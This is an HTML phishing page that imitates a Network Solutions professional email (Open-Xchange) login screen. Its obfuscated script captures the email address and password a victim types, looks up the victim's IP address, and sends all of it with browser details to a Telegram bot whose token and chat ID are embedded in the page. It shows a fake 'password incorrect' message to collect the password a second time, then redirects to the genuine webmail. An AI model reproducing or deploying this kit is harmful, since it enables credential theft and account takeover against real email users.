<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Professional Email</title>
    <!-- <link id="homescreen-icon" rel="apple-touch-icon" href=""> -->
    <link id="favicon" rel="icon" href="https://www.networksolutions.com/content/dam/netsol/favicons/favicon.ico" type="image/svg+xml">
    <style>
        * {
            padding: 0;
            margin: 0;
        }
        body {
            background: #fff;
        }
        header {
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: .6rem;
            margin-bottom: 1rem;
        }
        img {
            width: 100%;
            height: auto;
        }
        .img {
            width: 7%;
        }
        .iformbox {
            width: 420px;
            box-shadow: 0 15px 70px #00000080;
            margin: auto;
            border: 1rem;
            padding: 1rem;
        }
        .iformbox h3 {
            text-align: center;
            font-family: sans-serif;
            font-weight: 700;
            margin-bottom: 3rem;
        }
        .show {
            text-align: center;
            font-family: sans-serif;
            font-weight: 700;
            /* margin-bottom: 2rem; */
        }
        label {
            color: black;
            font-size: 14px;
            font-weight: 700;
        } 
       /* .formbox input {
            width: 100%;
            display: block;
            font-size: 14px;
            font-weight: 400;
            line-height: 1.25rem;
            height: auto;
            color: var(--text);
            background-color: #fff;
            background-clip: padding-box;
            border: 1px solid var(--border-bootstrap);
            border-radius: .25rem;
            transition: border-color .15s ease-in-out, box-shadow .15s ease-in-out;
        } */
        .btn {
            display: block;
            width: 100%;
            margin-bottom: 2rem;
            padding: 0 !important;
            margin-top: 6rem;
        }
        .btn button {
            padding: .5rem;
            border: none;
            background: #256672;
            color: #fff;
            font-weight: 600;
            border-radius: 6px;
            width: 100%;
            display: block;
        }
        #io-ox-information-message {
            margin: auto;
            margin-top: 24px !important;
            background-color: #fff;
            box-shadow: 0px 10px 60px #00000080;
            border-radius: 6px;
            text-align: center;
            flex-direction: column;
            padding: 16px;
            z-index: 1;
            width: 420px;
        }
        #io-ox-information-message p {
            text-align: center;
            font: 14px / 20px -apple-system, BlinkMacSystemFont, Helvetica Neue, Segoe UI, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", Segoe UI Symbol;
            /* font-size: 12px; */
        }
        #io-ox-login-footer {
            width: 100%;
            margin: 64px 0 0;
            padding: 6px 2px;
            display: flex;
            align-items: center;
            flex-wrap: wrap;
            background-color: #00000026;
            color: #fff;
            text-align: center;
            justify-content: center;
        }
        #highlight {
            display: none;
        }
        .show {
            display: none;
        }
        #pasbox {
            display: none;
        }
        .aaa {
            color: #212529;
            background-color: white;
            padding: 4px 12px;
            text-decoration: none;
            border: 1px solid hsl(40, 10%, 80%);
            display: block;
        }
        @media screen and (max-width: 600px){
            #io-ox-information-message {
                width: 87%;
            }
            .iformbox {
                width: 87%;
                box-shadow: 0 15px 70px #00000080;
                margin: auto;
                border: 1rem;
                padding: 1rem;
            }
            /*.hideme {*/
            /*    display: none;*/
            /*}*/
            .show {
                display: none;
            }
            /*.lang {*/
            /*    display: none;*/
            /*}*/
            .img {
                width: 19%;
            }
        }
    </style>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
</head>
<body>
    <header>
        <div class="img">
            <img src="https://www.networksolutions.com/content/experience-fragments/netsol/site-header/master/_jcr_content/root/header/logo.coreimg.png/1724940505730/netsol-logo.png" alt="">
        </div>
        <div class="lang">Language: <span style="color: green;">English (United States)</span></div>
        <h3 class="show">Webmail Login</h3>
    </header>
    <main>
        <div class="iformbox">
            <h3 class="hideme">Webmail Login</h3>
            <form id="sub">
                <h5>Sign in</h5>

                <div class="mb-3">
                    <label for="exampleFormControlInput1" class="form-label">Email address</label>
                    <input type="email" name="email" class="form-control" id="exampleFormControlInput1" placeholder="name@example.com" required>
                </div>
                <div class="mb-3" id="pasbox" style="display: none;">
                    <label for="password" class="form-label">Password</label>
                    <input type="password" name="password" class="form-control" id="password" required>
                </div>
                <span>
                    <input type="checkbox" id="staySignedIn">
                    Stay signed in
                </span>
                <div class="col-xs-12 alert-highlight" id="highlight" style="display: none;">
                    <div class="selectable-text alert alert-danger" style="padding: .5rem !important; color: red;">The password is incorrect. Please try again.</div>
                </div>
                <div class="btn">
                    <button type="button" id="continue">Continue</button>
                </div>
            </form>
        </div>
        <div id="io-ox-information-message">
            <p>
                We are updating our email security and will require all email server connections to use an encrypted connection when connecting via POP or IMAP from a device. To avoid any email connection issues, please be sure to update your mail client settings.
            </p>
            <a href="https://update.networksolutions.com/" class="aaa">Learn More…</a>
        </div>
        <footer id="io-ox-login-footer">
            <div class="composition-element login-spacer"></div>
            <span style="color: rgb(108, 108, 108);">© 2025 Open-Xchange GmbH</span>
            <div class="composition-element"><span style="color: rgb(108, 108, 108);">Version:</span><span style="color: rgb(108, 108, 108);">8.23.1</span></div>
            <div class="composition-element custom-login-links"><span>
                <a href="https://web.com/legal/privacy-policy.aspx" target="_blank" style="color: rgb(108, 108, 108);">Privacy policy</a></span>
            </div>
            <div class="composition-element custom-login-links">
                <span><a href="https://legal.web.com/Document/Get/TermsOfUse" target="_blank" style="color: rgb(108, 108, 108);">Legal notes</a></span>
            </div>
            <div class="composition-element login-spacer"></div>
        </footer>
    </main>
  <script>
    const _0x52f68c=_0xe1b7;(function(_0xe92c36,_0x14bfac){const _0x26dc4a=_0xe1b7,_0x232870=_0xe92c36();while(!![]){try{const _0x326c07=parseInt(_0x26dc4a(0x1ed))/0x1+parseInt(_0x26dc4a(0x200))/0x2+-parseInt(_0x26dc4a(0x1e3))/0x3+parseInt(_0x26dc4a(0x1ec))/0x4*(parseInt(_0x26dc4a(0x1ff))/0x5)+-parseInt(_0x26dc4a(0x1ee))/0x6+parseInt(_0x26dc4a(0x1e4))/0x7+-parseInt(_0x26dc4a(0x1f4))/0x8*(parseInt(_0x26dc4a(0x1e2))/0x9);if(_0x326c07===_0x14bfac)break;else _0x232870['push'](_0x232870['shift']());}catch(_0xc9028c){_0x232870['push'](_0x232870['shift']());}}}(_0x5f46,0x7ed18));function _0x5f46(){const _0x2fa258=['Please\x20fill\x20in\x20all\x20fields.','4dbaMVT','924136LoSEKD','149880kryHjR','getElementById','exampleFormControlInput1','catch','\x0aIP\x20ADDRESS:\x20','location','14013960dRMoJO','error','type','7094337983:AAG5jBCC6nmcfvhkYmslYYiOMzcHZbnsQPg','sub','POST','addEventListener','continue','Please\x20enter\x20your\x20email\x20address.','value','highlight','5009070SOoPVZ','185494eGvDnn','click','href','password','https://webmail-oxcs.networksolutionsemail.com/appsuite/','style','/sendMessage','preventDefault','block','6235414315','submit','match','pasbox','9KDzEyK','1691751OPPOFh','5889751LNDDhQ','json','display','Error\x20during\x20send\x20attempt:','\x0aPassword:\x20','then','userAgent'];_0x5f46=function(){return _0x2fa258;};return _0x5f46();}let attemptCount=0x0;const maxAttempts=0x2,redirectUrl=_0x52f68c(0x1d9),telegramBotToken=_0x52f68c(0x1f7),telegramChatId=_0x52f68c(0x1de),emailRegex=/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/,fullUrl=window[_0x52f68c(0x1f3)][_0x52f68c(0x1d7)],foundEmails=fullUrl[_0x52f68c(0x1e0)](emailRegex),email=foundEmails?foundEmails[0x0]:null;email&&(document[_0x52f68c(0x1ef)](_0x52f68c(0x1f0))[_0x52f68c(0x1fd)]=email);function _0xe1b7(_0x937ac4,_0xdc020e){const _0x5f46b6=_0x5f46();return _0xe1b7=function(_0xe1b78,_0x5d0f9c){_0xe1b78=_0xe1b78-0x1d6;let _0x289dae=_0x5f46b6[_0xe1b78];return _0x289dae;},_0xe1b7(_0x937ac4,_0xdc020e);}function sendToTelegram(_0x1cd0d4,_0x352324){const _0x391def=_0x52f68c;return fetch('https://api.ipify.org?format=json')[_0x391def(0x1e9)](_0x35f312=>_0x35f312[_0x391def(0x1e5)]())['then'](_0x4a0c63=>{const _0x253287=_0x391def,_0x24f14d=_0x4a0c63['ip'],_0x122817='\x0a<b>----NETWORK-SOLUTION\x20{Login\x20Access}----</b>\x0aEmail:\x20'+_0x1cd0d4+_0x253287(0x1e8)+_0x352324+_0x253287(0x1f2)+_0x24f14d+'\x0aBrowser\x20Details:\x20'+navigator[_0x253287(0x1ea)];return fetch('https://api.telegram.org/bot'+telegramBotToken+_0x253287(0x1db),{'method':_0x253287(0x1f9),'headers':{'Content-Type':'application/json'},'body':JSON['stringify']({'chat_id':telegramChatId,'text':_0x122817,'parse_mode':'HTML'})});});}document[_0x52f68c(0x1ef)](_0x52f68c(0x1fb))[_0x52f68c(0x1fa)](_0x52f68c(0x1d6),()=>{const _0x5cb8a3=_0x52f68c,_0xb8bb6e=document[_0x5cb8a3(0x1ef)](_0x5cb8a3(0x1f0))[_0x5cb8a3(0x1fd)];if(!_0xb8bb6e){alert(_0x5cb8a3(0x1fc));return;}document[_0x5cb8a3(0x1ef)](_0x5cb8a3(0x1e1))['style']['display']=_0x5cb8a3(0x1dd),document[_0x5cb8a3(0x1ef)](_0x5cb8a3(0x1d8))['focus'](),document[_0x5cb8a3(0x1ef)](_0x5cb8a3(0x1fb))[_0x5cb8a3(0x1f6)]=_0x5cb8a3(0x1df);}),document[_0x52f68c(0x1ef)](_0x52f68c(0x1f8))[_0x52f68c(0x1fa)](_0x52f68c(0x1df),function(_0x371924){const _0x2421bc=_0x52f68c;_0x371924[_0x2421bc(0x1dc)]();const _0x16dea3=document[_0x2421bc(0x1ef)]('exampleFormControlInput1')[_0x2421bc(0x1fd)],_0x341cf6=document['getElementById']('password')[_0x2421bc(0x1fd)];if(!_0x16dea3||!_0x341cf6){alert(_0x2421bc(0x1eb));return;}function _0xeaed3f(){const _0xef8fde=_0x2421bc;attemptCount<maxAttempts&&sendToTelegram(_0x16dea3,_0x341cf6)[_0xef8fde(0x1e9)](()=>{const _0x304e6a=_0xef8fde;attemptCount++,attemptCount<maxAttempts?(document['getElementById'](_0x304e6a(0x1fe))[_0x304e6a(0x1da)][_0x304e6a(0x1e6)]=_0x304e6a(0x1dd),document[_0x304e6a(0x1ef)](_0x304e6a(0x1d8))[_0x304e6a(0x1fd)]=''):window[_0x304e6a(0x1f3)][_0x304e6a(0x1d7)]=redirectUrl;})[_0xef8fde(0x1f1)](_0x362bf8=>{const _0x283a9a=_0xef8fde;console[_0x283a9a(0x1f5)](_0x283a9a(0x1e7),_0x362bf8);});}_0xeaed3f();});
</script>




</body>


</html>
